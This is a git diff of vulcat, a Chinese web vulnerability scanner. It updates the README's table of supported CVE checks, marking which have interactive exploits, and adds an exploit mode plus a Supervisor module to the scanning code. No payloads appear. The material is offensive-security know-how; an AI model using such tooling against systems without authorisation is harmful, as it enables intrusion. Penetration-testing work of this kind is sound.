-| Apache APISIX | CVE-2020-13945 | unAuth | Apache APISIX默认密钥 |
-+----------------------+--------------------+--------------+--------------------------------------------------------------------+
-| Apache Flink | CVE-2020-17519 | FileRead | Flink目录遍历 |
-+----------------------+--------------------+--------------+--------------------------------------------------------------------+
-| Apache Hadoop | None | unAuth | Hadoop YARN ResourceManager 未授权访问 |
-+----------------------+--------------------+--------------+--------------------------------------------------------------------+
-| Apache Httpd | CVE-2021-40438 | SSRF | Apache HTTP Server 2.4.48 mod_proxy SSRF |
-| Apache Httpd | CVE-2021-41773 | FileRead/RCE | Apache HTTP Server 2.4.49 路径遍历 |
-| Apache Httpd | CVE-2021-42013 | FileRead/RCE | Apache HTTP Server 2.4.50 路径遍历 |
-+----------------------+--------------------+--------------+--------------------------------------------------------------------+
-| Apache SkyWalking | CVE-2020-9483 | SQLinject | SkyWalking SQL注入 |
-+----------------------+--------------------+--------------+--------------------------------------------------------------------+
-| Apache Solr | CVE-2017-12629 | RCE | Solr 远程命令执行 |
-| Apache Solr | CVE-2019-17558 | RCE | Solr Velocity 注入远程命令执行 |
-| Apache Solr | CVE-2021-27905 | SSRF | Solr SSRF/任意文件读取 |
-+----------------------+--------------------+--------------+--------------------------------------------------------------------+
-| Apache Struts2 | S2-001 | RCE | Struts2远程代码执行 |
-| Apache Struts2 | S2-005 | RCE | Struts2远程代码执行 |
-| Apache Struts2 | S2-007 | RCE | Struts2远程代码执行 |
-| Apache Struts2 | S2-008 | RCE | Struts2远程代码执行 |
-| Apache Struts2 | S2-009 | RCE | Struts2远程代码执行 |
-| Apache Struts2 | S2-012 | RCE | Struts2远程代码执行 |
-+----------------------+--------------------+--------------+--------------------------------------------------------------------+
-| Apache Tomcat | CVE-2017-12615 | FileUpload | PUT方法任意文件写入 |
-+----------------------+--------------------+--------------+--------------------------------------------------------------------+
-| AppWeb | CVE-2018-8715 | unAuth | AppWeb身份认证绕过 |
-+----------------------+--------------------+--------------+--------------------------------------------------------------------+
-| Atlassian Confluence | CVE-2015-8399 | FileRead | Confluence任意文件包含 |
-| Atlassian Confluence | CVE-2019-3396 | RCE/FileRead | Confluence路径遍历和命令执行 |
-| Atlassian Confluence | CVE-2021-26084 | RCE | Confluence Webwork Pre-Auth OGNL表达式命令注入 |
-| Atlassian Confluence | CVE-2022-26134 | RCE | Confluence远程代码执行 |
-+----------------------+--------------------+--------------+--------------------------------------------------------------------+
-| Cisco | CVE-2020-3580 | XSS | 思科ASA/FTD XSS跨站脚本攻击 |
-+----------------------+--------------------+--------------+--------------------------------------------------------------------+
-| Discuz | wooyun-2010-080723 | RCE | 全局变量防御绕过RCE |
-+----------------------+--------------------+--------------+--------------------------------------------------------------------+
-| Django | CVE-2017-12794 | XSS | debug page XSS跨站脚本攻击 |
-| Django | CVE-2018-14574 | Redirect | CommonMiddleware url重定向 |
-| Django | CVE-2019-14234 | SQLinject | JSONfield SQL注入 |
-| Django | CVE-2020-9402 | SQLinject | GIS SQL注入 |
-| Django | CVE-2021-35042 | SQLinject | QuerySet.order_by SQL注入 |
-+----------------------+--------------------+--------------+--------------------------------------------------------------------+
-| Drupal | CVE-2014-3704 | SQLinject | Drupal < 7.32 Drupalgeddon SQL 注入 |
-| Drupal | CVE-2017-6920 | RCE | Drupal Core 8 PECL YAML 反序列化代码执行 |
-| Drupal | CVE-2018-7600 | RCE | Drupal Drupalgeddon 2 远程代码执行 |
-| Drupal | CVE-2018-7602 | RCE | Drupal 远程代码执行 |
-+----------------------+--------------------+--------------+--------------------------------------------------------------------+
-| ElasticSearch | CVE-2014-3120 | RCE | ElasticSearch命令执行 |
-| ElasticSearch | CVE-2015-1427 | RCE | ElasticSearch Groovy 沙盒绕过&&代码执行 |
-| ElasticSearch | CVE-2015-3337 | FileRead | ElasticSearch 目录穿越 |
-| ElasticSearch | CVE-2015-5531 | FileRead | ElasticSearch 目录穿越 |
-+----------------------+--------------------+--------------+--------------------------------------------------------------------+
-| F5 BIG-IP | CVE-2020-5902 | RCE | BIG-IP远程代码执行 |
-| F5 BIG-IP | CVE-2022-1388 | unAuth | BIG-IP远程代码执行 |
-+----------------------+--------------------+--------------+--------------------------------------------------------------------+
-| Fastjson | CNVD-2017-02833 | unSerialize | Fastjson <= 1.2.24 反序列化 |
-| Fastjson | CNVD-2019-22238 | unSerialize | Fastjson <= 1.2.47 反序列化 |
-+----------------------+--------------------+--------------+--------------------------------------------------------------------+
-| Gitea | None | unAuth | Gitea 1.4.0 未授权访问 |
-+----------------------+--------------------+--------------+--------------------------------------------------------------------+
-| Gitlab | CVE-2021-22205 | RCE | GitLab Pre-Auth 远程命令执行 |
-| Gitlab | CVE-2021-22214 | SSRF | Gitlab CI Lint API未授权 SSRF |
-+----------------------+--------------------+--------------+--------------------------------------------------------------------+
-| Grafana | CVE-2021-43798 | FileRead | Grafana 8.x 插件模块路径遍历 |
-+----------------------+--------------------+--------------+--------------------------------------------------------------------+
-| Influxdb | None | unAuth | influxdb 未授权访问 |
-+----------------------+--------------------+--------------+--------------------------------------------------------------------+
-| Jenkins | CVE-2018-1000861 | RCE | jenkins 远程命令执行 |
-+----------------------+--------------------+--------------+--------------------------------------------------------------------+
-| Jetty | CVE-2021-28164 | DSinfo | jetty 模糊路径信息泄露 |
-| Jetty | CVE-2021-28169 | DSinfo | jetty Utility Servlets ConcatServlet 双重解码信息泄露 |
-| Jetty | CVE-2021-34429 | DSinfo | jetty 模糊路径信息泄露 |
-+----------------------+--------------------+--------------+--------------------------------------------------------------------+
-| Jupyter | None | unAuth | Jupyter 未授权访问 |
-+----------------------+--------------------+--------------+--------------------------------------------------------------------+
-| Keycloak | CVE-2020-10770 | SSRF | 使用request_uri调用未经验证的URL |
-+----------------------+--------------------+--------------+--------------------------------------------------------------------+
-| Landray | CNVD-2021-28277 | FileRead/SSRF| 蓝凌OA 任意文件读取/SSRF |
-+----------------------+--------------------+--------------+--------------------------------------------------------------------+
-| Mini Httpd | CVE-2018-18778 | FileRead | mini_httpd 任意文件读取 |
-+----------------------+--------------------+--------------+--------------------------------------------------------------------+
-| mongo-express | CVE-2019-10758 | RCE | 未授权远程代码执行 |
-+----------------------+--------------------+--------------+--------------------------------------------------------------------+
-| Nexus Repository | CVE-2019-5475 | RCE | 2.x yum插件 远程命令执行 |
-| Nexus Repository | CVE-2019-7238 | RCE | 3.x 远程命令执行 |
-| Nexus Repository | CVE-2019-15588 | RCE | 2019-5475的绕过 |
-| Nexus Repository | CVE-2020-10199 | RCE | 3.x 远程命令执行 |
-| Nexus Repository | CVE-2020-10204 | RCE | 3.x 远程命令执行 |
-+----------------------+--------------------+--------------+--------------------------------------------------------------------+
-| Nodejs | CVE-2017-14849 | FileRead | Node.js目录穿越 |
-| Nodejs | CVE-2021-21315 | RCE | Node.js命令执行 |
-+----------------------+--------------------+--------------+--------------------------------------------------------------------+
-| NodeRED | CVE-2021-3223 | FileRead | Node-RED 任意文件读取 |
-+----------------------+--------------------+--------------+--------------------------------------------------------------------+
-| phpMyadmin | WooYun-2016-199433 | unSerialize | phpMyadmin Scripts/setup.php 反序列化 |
-| phpMyadmin | CVE-2018-12613 | FileInclude | phpMyadmin 4.8.1 远程文件包含 |
-+----------------------+--------------------+--------------+--------------------------------------------------------------------+
-| PHPUnit | CVE-2017-9841 | RCE | PHPUnit 远程代码执行 |
-+----------------------+--------------------+--------------+--------------------------------------------------------------------+
-| Ruby on Rails | CVE-2018-3760 | FileRead | Ruby on Rails 路径遍历 |
-| Ruby on Rails | CVE-2019-5418 | FileRead | Ruby on Rails 任意文件读取 |
-| Ruby on Rails | CVE-2020-8163 | RCE | Ruby on Rails 命令执行 |
-+----------------------+--------------------+--------------+--------------------------------------------------------------------+
-| ShowDoc | CNVD-2020-26585 | FileUpload | ShowDoc 任意文件上传 |
-+----------------------+--------------------+--------------+--------------------------------------------------------------------+
-| Spring | CVE-2016-4977 | RCE | Spring Security OAuth2 远程命令执行 |
-| Spring | CVE-2017-8046 | RCE | Spring Data Rest 远程命令执行 |
-| Spring | CVE-2018-1273 | RCE | Spring Data Commons 远程命令执行 |
-| Spring | CVE-2020-5410 | FileRead | Spring Cloud目录遍历 |
-| Spring | CVE-2021-21234 | FileRead | Spring Boot目录遍历 |
-| Spring | CVE-2022-22947 | RCE | Spring Cloud Gateway SpEl远程代码执行 |
-| Spring | CVE-2022-22963 | RCE | Spring Cloud Function SpEL远程代码执行 |
-| Spring | CVE-2022-22965 | RCE | Spring Framework远程代码执行 |
-+----------------------+--------------------+--------------+--------------------------------------------------------------------+
-| ThinkPHP | CVE-2018-1002015 | RCE | ThinkPHP5.x 远程代码执行 |
-| ThinkPHP | CNVD-2018-24942 | RCE | 未开启强制路由导致RCE |
-| ThinkPHP | CNNVD-201901-445 | RCE | 核心类Request远程代码执行 |
-| ThinkPHP | None | RCE | ThinkPHP2.x 远程代码执行 |
-| ThinkPHP | None | SQLinject | ThinkPHP5 ids参数SQL注入 |
-+----------------------+--------------------+--------------+--------------------------------------------------------------------+
-| Ueditor | None | SSRF | Ueditor编辑器SSRF |
-+----------------------+--------------------+--------------+--------------------------------------------------------------------+
-| Oracle Weblogic | CVE-2014-4210 | SSRF | Weblogic 服务端请求伪造 |
-| Oracle Weblogic | CVE-2017-10271 | unSerialize | Weblogic XMLDecoder反序列化 |
-| Oracle Weblogic | CVE-2019-2725 | unSerialize | Weblogic wls9_async反序列化 |
-| Oracle Weblogic | CVE-2020-14750 | unAuth | Weblogic 权限验证绕过 |
-| Oracle Weblogic | CVE-2020-14882 | RCE | Weblogic 未授权命令执行 |
-+----------------------+--------------------+--------------+--------------------------------------------------------------------+
-| Webmin | CVE-2019-15107 | RCE | Webmin Pre-Auth 远程代码执行 |
-| Webmin | CVE-2019-15642 | RCE | Webmin 远程代码执行 |
-+----------------------+--------------------+--------------+--------------------------------------------------------------------+
-| Yonyou | CNNVD-201610-923 | SQLinject | 用友GRP-U8 Proxy SQL注入 |
-| Yonyou | CNVD-2021-30167 | RCE | 用友NC BeanShell远程命令执行 |
-| Yonyou | None | FileRead | 用友ERP-NC NCFindWeb目录遍历 |
-| Yonyou | None | DSinfo | 用友U8 OA getSessionList.jsp 敏感信息泄漏 |
-| Yonyou | None | SQLinject | 用友U8 OA test.jsp SQL注入 |
-+----------------------+--------------------+--------------+--------------------------------------------------------------------+
-```
-
-
-## 行为规范
-在使用本工具前, 请确保您的行为符合当地法律法规, 并且已经取得了相关授权。
+## 行为规范和免责声明
+* **在使用本工具前, 请确保您的行为符合当地法律法规, 并且已经取得了相关授权。**
-本工具仅面向拥有合法授权的企业和个人等, 意在加强网络空间安全。
+* **本工具仅面向拥有合法授权的企业和个人等, 意在加强网络空间安全。**
-如果您在使用本工具的过程中存在任何非法行为, 或造成了任何严重后果, 您需自行承担相应责任, 我们将不承担任何法律及连带责任。
+* **如果您在使用本工具的过程中存在任何非法行为, 或造成了任何严重后果, 您需自行承担相应责任, 我们将不承担任何法律及连带责任。**
## 安装 && 使用
@@ -184,6 +32,10 @@ pip3 install -r requirements.txt -i https://mirrors.aliyun.com/pypi/simple
python3 vulcat.py -h
```
```
+Usage:
+使用本工具, 代表您同意"vulcat/README.zh-cn.md"中的"行为规范和免责声明"; 如果您不同意, 请勿使用本工具
+
+
Usage: python3 vulcat.py
Examples:
python3 vulcat.py -u https://www.example.com/
@@ -248,6 +100,8 @@ Options:
指定漏洞编号, 配合-a/--application对单个漏洞进行扫描, 可以使用--list查看漏洞编号,
没有漏洞编号的漏洞暂不支持, 编号不区分大小, 符号-和_皆可 (如: -a fastjson -v
CNVD-2019-22238 或者 -a Tomcat -v cvE-2017_12615)
+ -x, --exp 配合-a和-v参数进行使用, Poc扫描过后, 如果该漏洞存在, 则进入该漏洞的Exp交互模式; 可以使用
+ --list查看支持Exp的漏洞(如: -a httpd -v CVE-2021-42013 -x)
Api:
第三方api
@@ -282,7 +136,7 @@ Options:
drupal, elasticsearch, f5bigip, fastjson, flink, gitea, gitlab,
grafana, influxdb, hadoop, httpd, jenkins, jetty, jupyter, keycloak,
landray, minihttpd, mongoexpress, nexus, nacos, nodejs, nodered,
- phpmyadmin, phpunit, rails, showdoc, solr, struts2, spring,
+ phpmyadmin, phpunit, rails, showdoc, solr, spring, supervisor,
skywalking, thinkphp, tomcat, ueditor, weblogic, webmin, yonyou
```
@@ -309,18 +163,170 @@ args.ceye_token = ''
## 自定义 POC
* 如何编写自己的漏洞POC, 并添加到vulcat中
-* 找到vulcat/payloads/demo.py, demo.py是vulcat中的POC模板(半成品), 需要用户填写剩余的代码
+* 找到vulcat/payloads/demo/demo.py, demo.py是vulcat中的POC模板(半成品), 需要用户填写剩余的代码
* **修改步骤:**
1. 先将demo.py复制一份并保存, 防止模板丢失, 然后修改文件名为POC的名字(如test.py), 文件名可以自定义
2. 然后根据demo.py中的提示, 填写自己的代码, 并在vulcat中引入POC
+## 漏洞列表
+
+目前支持扫描的web漏洞有: [点击展开]
+
+```
++----------------------+--------------------+--------------+-----+----------------------------------------------------------------------+
+| Target | Vuln id | Vuln Type | Exp | Description |
++----------------------+--------------------+--------------+-----+----------------------------------------------------------------------+
+| Alibaba Druid | None | unAuth | - | 阿里巴巴Druid未授权访问 |
++----------------------+--------------------+--------------+-----+----------------------------------------------------------------------+
+| Alibaba Nacos | CVE-2021-29441 | unAuth | - | 阿里巴巴Nacos未授权访问 |
++----------------------+--------------------+--------------+-----+----------------------------------------------------------------------+
+| Apache Airflow | CVE-2020-17526 | unAuth | - | Airflow身份验证绕过 |
++----------------------+--------------------+--------------+-----+----------------------------------------------------------------------+
+| Apache APISIX | CVE-2020-13945 | unAuth | - | Apache APISIX默认密钥 |
++----------------------+--------------------+--------------+-----+----------------------------------------------------------------------+
+| Apache Flink | CVE-2020-17519 | FileRead | Y | Flink目录遍历 |
++----------------------+--------------------+--------------+-----+----------------------------------------------------------------------+
+| Apache Hadoop | None | unAuth | - | Hadoop YARN ResourceManager 未授权访问 |
++----------------------+--------------------+--------------+-----+----------------------------------------------------------------------+
+| Apache Httpd | CVE-2021-40438 | SSRF | - | Apache HTTP Server 2.4.48 mod_proxy SSRF |
+| Apache Httpd | CVE-2021-41773 | FileRead/RCE | Y | Apache HTTP Server 2.4.49 路径遍历 |
+| Apache Httpd | CVE-2021-42013 | FileRead/RCE | Y | Apache HTTP Server 2.4.50 路径遍历 |
++----------------------+--------------------+--------------+-----+----------------------------------------------------------------------+
+| Apache SkyWalking | CVE-2020-9483 | SQLinject | - | SkyWalking SQL注入 |
++----------------------+--------------------+--------------+-----+----------------------------------------------------------------------+
+| Apache Solr | CVE-2017-12629 | RCE | - | Solr 远程命令执行 |
+| Apache Solr | CVE-2019-17558 | RCE | Y | Solr Velocity 注入远程命令执行 |
+| Apache Solr | CVE-2021-27905 | SSRF/FileRead| Y | Solr SSRF/任意文件读取 |
++----------------------+--------------------+--------------+-----+----------------------------------------------------------------------+
+| Apache Tomcat | CVE-2017-12615 | FileUpload | - | PUT方法任意文件写入 |
++----------------------+--------------------+--------------+-----+----------------------------------------------------------------------+
+| AppWeb | CVE-2018-8715 | unAuth | - | AppWeb身份认证绕过 |
++----------------------+--------------------+--------------+-----+----------------------------------------------------------------------+
+| Atlassian Confluence | CVE-2015-8399 | FileRead | Y | Confluence任意文件包含 |
+| Atlassian Confluence | CVE-2019-3396 | RCE/FileRead | Y | Confluence路径遍历和命令执行 |
+| Atlassian Confluence | CVE-2021-26084 | RCE | Y | Confluence Webwork Pre-Auth OGNL表达式命令注入 |
+| Atlassian Confluence | CVE-2022-26134 | RCE | Y | Confluence远程代码执行 |
++----------------------+--------------------+--------------+-----+----------------------------------------------------------------------+
+| Cisco | CVE-2020-3580 | XSS | - | 思科ASA/FTD XSS跨站脚本攻击 |
++----------------------+--------------------+--------------+-----+----------------------------------------------------------------------+
+| Discuz | wooyun-2010-080723 | RCE | Y | 全局变量防御绕过RCE |
++----------------------+--------------------+--------------+-----+----------------------------------------------------------------------+
+| Django | CVE-2017-12794 | XSS | - | debug page XSS跨站脚本攻击 |
+| Django | CVE-2018-14574 | Redirect | - | CommonMiddleware url重定向 |
+| Django | CVE-2019-14234 | SQLinject | - | JSONfield SQL注入 |
+| Django | CVE-2020-9402 | SQLinject | - | GIS SQL注入 |
+| Django | CVE-2021-35042 | SQLinject | - | QuerySet.order_by SQL注入 |
++----------------------+--------------------+--------------+-----+----------------------------------------------------------------------+
+| Drupal | CVE-2014-3704 | SQLinject | - | Drupal < 7.32 Drupalgeddon SQL 注入 |
+| Drupal | CVE-2017-6920 | RCE | - | Drupal Core 8 PECL YAML 反序列化代码执行 |
+| Drupal | CVE-2018-7600 | RCE | Y | Drupal Drupalgeddon 2 远程代码执行 |
+| Drupal | CVE-2018-7602 | RCE | - | Drupal 远程代码执行 |
++----------------------+--------------------+--------------+-----+----------------------------------------------------------------------+
+| ElasticSearch | CVE-2014-3120 | RCE | Y | ElasticSearch命令执行 |
+| ElasticSearch | CVE-2015-1427 | RCE | Y | ElasticSearch Groovy 沙盒绕过&&代码执行 |
+| ElasticSearch | CVE-2015-3337 | FileRead | Y | ElasticSearch 目录穿越 |
+| ElasticSearch | CVE-2015-5531 | FileRead | Y | ElasticSearch 目录穿越 |
++----------------------+--------------------+--------------+-----+----------------------------------------------------------------------+
+| F5 BIG-IP | CVE-2020-5902 | RCE | - | BIG-IP远程代码执行 |
+| F5 BIG-IP | CVE-2022-1388 | unAuth | Y | BIG-IP远程代码执行 |
++----------------------+--------------------+--------------+-----+----------------------------------------------------------------------+
+| Fastjson | CNVD-2017-02833 | unSerialize | - | Fastjson <= 1.2.24 反序列化 |
+| Fastjson | CNVD-2019-22238 | unSerialize | - | Fastjson <= 1.2.47 反序列化 |
++----------------------+--------------------+--------------+-----+----------------------------------------------------------------------+
+| Gitea | None | unAuth | - | Gitea 1.4.0 未授权访问 |
++----------------------+--------------------+--------------+-----+----------------------------------------------------------------------+
+| Gitlab | CVE-2021-22205 | RCE | - | GitLab Pre-Auth 远程命令执行 |
+| Gitlab | CVE-2021-22214 | SSRF | - | Gitlab CI Lint API未授权 SSRF |
++----------------------+--------------------+--------------+-----+----------------------------------------------------------------------+
+| Grafana | CVE-2021-43798 | FileRead | Y | Grafana 8.x 插件模块路径遍历 |
++----------------------+--------------------+--------------+-----+----------------------------------------------------------------------+
+| Influxdb | None | unAuth | - | influxdb 未授权访问 |
++----------------------+--------------------+--------------+-----+----------------------------------------------------------------------+
+| Jenkins | CVE-2018-1000861 | RCE | - | jenkins 远程命令执行 |
++----------------------+--------------------+--------------+-----+----------------------------------------------------------------------+
+| Jetty | CVE-2021-28164 | DSinfo | - | jetty 模糊路径信息泄露 |
+| Jetty | CVE-2021-28169 | DSinfo | - | jetty Utility Servlets ConcatServlet 双重解码信息泄露 |
+| Jetty | CVE-2021-34429 | DSinfo | - | jetty 模糊路径信息泄露 |
++----------------------+--------------------+--------------+-----+----------------------------------------------------------------------+
+| Jupyter | None | unAuth | - | Jupyter 未授权访问 |
++----------------------+--------------------+--------------+-----+----------------------------------------------------------------------+
+| Keycloak | CVE-2020-10770 | SSRF | - | 使用request_uri调用未经验证的URL |
++----------------------+--------------------+--------------+-----+----------------------------------------------------------------------+
+| Landray | CNVD-2021-28277 | FileRead/SSRF| Y | 蓝凌OA 任意文件读取/SSRF |
++----------------------+--------------------+--------------+-----+----------------------------------------------------------------------+
+| Mini Httpd | CVE-2018-18778 | FileRead | - | mini_httpd 任意文件读取 |
++----------------------+--------------------+--------------+-----+----------------------------------------------------------------------+
+| mongo-express | CVE-2019-10758 | RCE | - | 未授权远程代码执行 |
++----------------------+--------------------+--------------+-----+----------------------------------------------------------------------+
+| Nexus Repository | CVE-2019-5475 | RCE | Y | 2.x yum插件 远程命令执行 |
+| Nexus Repository | CVE-2019-7238 | RCE | - | 3.x 远程命令执行 |
+| Nexus Repository | CVE-2019-15588 | RCE | Y | 2019-5475的绕过 |
+| Nexus Repository | CVE-2020-10199 | RCE | - | 3.x 远程命令执行 |
+| Nexus Repository | CVE-2020-10204 | RCE | - | 3.x 远程命令执行 |
++----------------------+--------------------+--------------+-----+----------------------------------------------------------------------+
+| Nodejs | CVE-2017-14849 | FileRead | Y | Node.js目录穿越 |
+| Nodejs | CVE-2021-21315 | RCE | - | Node.js命令执行 |
++----------------------+--------------------+--------------+-----+----------------------------------------------------------------------+
+| NodeRED | CVE-2021-3223 | FileRead | Y | Node-RED 任意文件读取 |
++----------------------+--------------------+--------------+-----+----------------------------------------------------------------------+
+| phpMyadmin | WooYun-2016-199433 | unSerialize | - | phpMyadmin Scripts/setup.php 反序列化 |
+| phpMyadmin | CVE-2018-12613 | FileInclude | Y | phpMyadmin 4.8.1 远程文件包含 |
++----------------------+--------------------+--------------+-----+----------------------------------------------------------------------+
+| PHPUnit | CVE-2017-9841 | RCE | Y | PHPUnit 远程代码执行 |
++----------------------+--------------------+--------------+-----+----------------------------------------------------------------------+
+| Ruby on Rails | CVE-2018-3760 | FileRead | Y | Ruby on Rails 路径遍历 |
+| Ruby on Rails | CVE-2019-5418 | FileRead | Y | Ruby on Rails 任意文件读取 |
+| Ruby on Rails | CVE-2020-8163 | RCE | - | Ruby on Rails 命令执行 |
++----------------------+--------------------+--------------+-----+----------------------------------------------------------------------+
+| ShowDoc | CNVD-2020-26585 | FileUpload | - | ShowDoc 任意文件上传 |
++----------------------+--------------------+--------------+-----+----------------------------------------------------------------------+
+| Spring | CVE-2016-4977 | RCE | - | Spring Security OAuth2 远程命令执行 |
+| Spring | CVE-2017-8046 | RCE | - | Spring Data Rest 远程命令执行 |
+| Spring | CVE-2018-1273 | RCE | - | Spring Data Commons 远程命令执行 |
+| Spring | CVE-2020-5410 | FileRead | Y | Spring Cloud目录遍历 |
+| Spring | CVE-2021-21234 | FileRead | Y | Spring Boot目录遍历 |
+| Spring | CVE-2022-22947 | RCE | - | Spring Cloud Gateway SpEl远程代码执行 |
+| Spring | CVE-2022-22963 | RCE | - | Spring Cloud Function SpEL远程代码执行 |
+| Spring | CVE-2022-22965 | RCE | - | Spring Framework远程代码执行 |
++----------------------+--------------------+--------------+-----+----------------------------------------------------------------------+
+| Supervisor | CVE-2017-11610 | RCE | - | Supervisor 远程命令执行 |
++----------------------+--------------------+--------------+-----+----------------------------------------------------------------------+
+| ThinkPHP | CVE-2018-1002015 | RCE | Y | ThinkPHP5.x 远程代码执行 |
+| ThinkPHP | CNVD-2018-24942 | RCE | Y | 未开启强制路由导致RCE |
+| ThinkPHP | CNNVD-201901-445 | RCE | Y | 核心类Request远程代码执行 |
+| ThinkPHP | None | RCE | - | ThinkPHP2.x 远程代码执行 |
+| ThinkPHP | None | SQLinject | - | ThinkPHP5 ids参数SQL注入 |
++----------------------+--------------------+--------------+-----+----------------------------------------------------------------------+
+| Ueditor | None | SSRF | - | Ueditor编辑器SSRF |
++----------------------+--------------------+--------------+-----+----------------------------------------------------------------------+
+| Oracle Weblogic | CVE-2014-4210 | SSRF | - | Weblogic 服务端请求伪造 |
+| Oracle Weblogic | CVE-2017-10271 | unSerialize | - | Weblogic XMLDecoder反序列化 |
+| Oracle Weblogic | CVE-2019-2725 | unSerialize | - | Weblogic wls9_async反序列化 |
+| Oracle Weblogic | CVE-2020-14750 | unAuth | - | Weblogic 权限验证绕过 |
+| Oracle Weblogic | CVE-2020-14882 | RCE | - | Weblogic 未授权命令执行 |
++----------------------+--------------------+--------------+-----+----------------------------------------------------------------------+
+| Webmin | CVE-2019-15107 | RCE | Y | Webmin Pre-Auth 远程代码执行 |
+| Webmin | CVE-2019-15642 | RCE | Y | Webmin 远程代码执行 |
++----------------------+--------------------+--------------+-----+----------------------------------------------------------------------+
+| Yonyou | CNNVD-201610-923 | SQLinject | - | 用友GRP-U8 Proxy SQL注入 |
+| Yonyou | CNVD-2021-30167 | RCE | Y | 用友NC BeanShell远程命令执行 |
+| Yonyou | None | FileRead | - | 用友ERP-NC NCFindWeb目录遍历 |
+| Yonyou | None | DSinfo | - | 用友U8 OA getSessionList.jsp 敏感信息泄漏 |
+| Yonyou | None | SQLinject | - | 用友U8 OA test.jsp SQL注入 |
++----------------------+--------------------+--------------+-----+----------------------------------------------------------------------+
+vulcat-1.1.5/2022.11
+94/Poc
+34/Exp
+```
+
+
## 感谢
-感谢以下开源项目提供的灵感以及部分源代码
* [vulmap](https://github.com/zhzyker/vulmap)
* [sqlmap](https://github.com/sqlmapproject/sqlmap)
* [dirsearch](https://github.com/maurosoria/dirsearch)
+* [HackRequests](https://github.com/boy-hack/hack-requests)
## 参考链接
diff --git a/lib/core/coreScan.py b/lib/core/coreScan.py
index 4bd70a2..30e559d 100644
--- a/lib/core/coreScan.py
+++ b/lib/core/coreScan.py
@@ -10,6 +10,7 @@
from lib.plugins.fingerprint.waf import waf
from lib.plugins.fingerprint.webapp import webapp
+from lib.plugins.exploit import exploit
from payloads.AlibabaDruid import alidruid
from payloads.AlibabaNacos import nacos
@@ -21,7 +22,7 @@
from payloads.ApacheSkyWalking import skywalking
from payloads.ApacheSolr import solr
from payloads.ApacheTomcat import tomcat
-from payloads.ApacheStruts2 import struts2
+# from payloads.ApacheStruts2 import struts2 # 2022/11/04被移除
from payloads.AppWeb import appweb
from payloads.AtlassianConfluence import confluence
from payloads.Cisco import cisco
@@ -39,7 +40,7 @@
from payloads.Jetty import jetty
from payloads.Jupyter import jupyter
from payloads.Keycloak import keycloak
-# from payloads.Kindeditor import kindeditor
+# from payloads.Kindeditor import kindeditor # 还未测试poc准确性
from payloads.Landray import landray
from payloads.MiniHttpd import minihttpd
from payloads.MongoExpress import mongoexpress
@@ -51,6 +52,7 @@
from payloads.RubyOnRails import rails
from payloads.ShowDoc import showdoc
from payloads.Spring import spring
+from payloads.Supervisor import supervisor
from payloads.ThinkPHP import thinkphp
from payloads.Ueditor import ueditor
from payloads.Weblogic import weblogic
@@ -74,6 +76,7 @@ def __init__(self):
self.batch = config.get('batch') # * 是否启用默认选项
self.no_waf = config.get('no_waf') # * 是否启用WAF指纹识别
self.no_poc = config.get('no_poc') # * 是否启用WAF指纹识别
+ self.exp = config.get('exp')
self.thread_list = [] # * 已经运行的线程列表
self.results = [] # * 结果列表
@@ -89,6 +92,10 @@ def start(self):
logger.info('red_ex', self.lang['core']['start']['url_error'].format(u))
continue
+ if self.exp and (not self.vuln):
+ logger.info('yellow_ex', self.lang['core']['start']['exp']) # ? 提示, 使用exp之前 请先使用-a和-v参数指定一个漏洞
+ break
+
logger.info('green_ex', self.lang['core']['start']['start'] + u) # ? 提示, 开始扫描当前url
if check.check_connect(u):
@@ -137,7 +144,7 @@ def start(self):
continue
if self.no_poc:
- logger.info('red', self.lang['core']['start']['no_poc'])
+ logger.info('red', self.lang['core']['start']['no_poc']) # ? 提示, 不进行漏洞扫描
continue
if check.check_connect(u):
@@ -232,6 +239,15 @@ def stop(self):
return False
+ def start_exp(self):
+ ''' 启动Exploit模式 '''
+ try:
+ f = open('Exploit.lock')
+ f.close()
+ logger.info('red', self.lang['core']['start_exp']['lock']) # ? 日志, 使用exp时 请先删除vulcat/Exploit.lock锁文件
+ except FileNotFoundError:
+ exploit.start(self.results)
+
def end(self):
''' 结束扫描, 等待所有线程运行完毕, 生成漏洞结果并输出/保存'''
logger.info('cyan_ex', self.lang['core']['end']['wait']) # ? 日志, 等待所有线程运行完毕, 时间长短取决于timeout参数
@@ -242,11 +258,14 @@ def end(self):
if self.txt_filename: # * 是否保存结果为.txt
output.output_text(self.results, self.txt_filename, self.lang)
- elif self.json_filename: # * 是否保存结果为.json
+ if self.json_filename: # * 是否保存结果为.json
output.output_json(self.results, self.json_filename, self.lang)
- # elif self.html_filename:
+ # if self.html_filename:
# output.output_html(self.results, self.html_filename, self.lang)
+ if self.exp and self.vuln: # * 是否使用Exp
+ self.start_exp()
+
logger.info('yellow_ex', self.lang['core']['end']['completed']) # ? 日志, 扫描完全结束, 退出运行
logger.info('reset', '', notime=True, print_end='') # * 重置文字颜色
print('\r'.ljust(70), end='\r') # * 解决wq的BUG
diff --git a/lib/initial/config.py b/lib/initial/config.py
index 358a914..24ccbbe 100644
--- a/lib/initial/config.py
+++ b/lib/initial/config.py
@@ -8,7 +8,6 @@
from lib.initial.language import language
from thirdparty.requests import packages
import re
-import http.client
import socket
import socks
@@ -21,7 +20,7 @@ def __init__(self, args):
args.ceye_domain = '' # * http://ceye.io/ 平台的域名
args.ceye_token = '' # * http://ceye.io/ 平台的token
-
+
args.lang = language() # * 语言
args.url_list = [] # * url列表
@@ -105,6 +104,7 @@ def __init__(self, args):
if args.vuln:
args.vuln = args.vuln.lower()
args.vuln = args.vuln.replace('-', '_')
+ args.vuln = args.vuln.replace('.', '_')
app_list = [
'alidruid', 'airflow', 'apisix', 'appweb',
@@ -122,7 +122,7 @@ def __init__(self, args):
'nexus', 'nacos', 'nodejs', 'nodered',
'phpmyadmin', 'phpunit',
'rails',
- 'showdoc', 'solr', 'struts2', 'spring', 'skywalking',
+ 'showdoc', 'solr', 'spring', 'skywalking', 'supervisor',
'thinkphp', 'tomcat',
'ueditor',
'weblogic', 'webmin',
diff --git a/lib/initial/language.py b/lib/initial/language.py
index a1bcc93..bd82d7a 100644
--- a/lib/initial/language.py
+++ b/lib/initial/language.py
@@ -47,7 +47,8 @@ def language():
'title': 'Application',
'name': 'Specify the target type for the scan',
'application': 'Specifies the target type, for supported frameworks, see the tips at the bottom, separated by commas (e.g. thinkphp / thinkphp,weblogic) (default: auto)',
